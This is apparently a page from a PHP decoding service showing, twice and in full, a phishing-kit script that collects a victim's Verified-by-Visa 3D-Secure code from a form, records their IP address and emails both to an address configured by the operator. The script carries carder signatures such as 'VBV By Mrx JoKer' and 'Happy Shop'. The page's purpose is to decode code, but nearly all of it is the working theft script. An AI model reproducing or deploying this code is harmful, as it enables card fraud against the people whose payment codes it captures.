Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $secure = $_POST['vbv_secure']; $ip_addresse = getenv('HTTP_CLIENT_IP')?: g..

Decoded Output download

<?php 
  $secure = $_POST['vbv_secure']; 
  $ip_addresse = getenv('HTTP_CLIENT_IP')?: 
  getenv('HTTP_X_FORWARDED_FOR')?: 
  getenv('HTTP_X_FORWARDED')?: 
  getenv('HTTP_FORWARDED_FOR')?: 
  getenv('HTTP_FORWARDED')?: 
  getenv('REMOTE_ADDR'); 
 
  $subject = "VBV | 3D-SECURE - FROM ". $ip_addresse ."  -"; 
  $headers = "From: MafioZo0 
"; 
  $headers .= "Reply-To: no-reply 
"; 
  $headers .= "MIME-Version: 1.0
"; 
  $headers .= "Content-Type: text/html; charset=ISO-8859-1
"; 
  $msg = "<div style='text-align: center; width: 400px'>"; 
  $msg .= "----------------------   VBV By Mrx JoKer   ------------------------- <br><br>"; 
  $msg .= "<b> 3D SECURE : </b> <span style='color: #3498DB;'>$secure</span> <br><br>"; 
 
  $msg .= "<b> Ip Address : </b> <span style='color: #FC575E;'>$ip_addresse</span> <br><br>"; 
  $msg .= "<a href='https://geoiptool.com/fr/?ip=$ip_addresse' target='_blank'>https://geoiptool.com/fr/?ip=$ip_addresse</a><br><br>"; 
  $msg .= "------------------- Good Luck & Happy Shop <3  ------------------------- <br><br>"; 
  $msg .= "</div>"; 
  include '../../config.php'; 
  $to = $result_to; 
  mail($to, $subject, $msg, $headers); 
?>

Did this file decode correctly?

Original Code

<?php
  $secure = $_POST['vbv_secure'];
  $ip_addresse = getenv('HTTP_CLIENT_IP')?:
  getenv('HTTP_X_FORWARDED_FOR')?:
  getenv('HTTP_X_FORWARDED')?:
  getenv('HTTP_FORWARDED_FOR')?:
  getenv('HTTP_FORWARDED')?:
  getenv('REMOTE_ADDR');

  $subject = "VBV | 3D-SECURE - FROM ". $ip_addresse ."  -";
  $headers = "From: MafioZo0 \r\n";
  $headers .= "Reply-To: no-reply \r\n";
  $headers .= "MIME-Version: 1.0\r\n";
  $headers .= "Content-Type: text/html; charset=ISO-8859-1\r\n";
  $msg = "<div style='text-align: center; width: 400px'>";
  $msg .= "----------------------   VBV By Mrx JoKer   ------------------------- <br><br>";
  $msg .= "<b> 3D SECURE : </b> <span style='color: #3498DB;'>$secure</span> <br><br>";

  $msg .= "<b> Ip Address : </b> <span style='color: #FC575E;'>$ip_addresse</span> <br><br>";
  $msg .= "<a href='https://geoiptool.com/fr/?ip=$ip_addresse' target='_blank'>https://geoiptool.com/fr/?ip=$ip_addresse</a><br><br>";
  $msg .= "------------------- Good Luck & Happy Shop <3  ------------------------- <br><br>";
  $msg .= "</div>";
  include '../../config.php';
  $to = $result_to;
  mail($to, $subject, $msg, $headers);
?>

Function Calls

None

Variables

None

Stats

MD5 b1c8ffe2fc3c1506f7294411553c2916
Eval Count 0
Decode Time 136 ms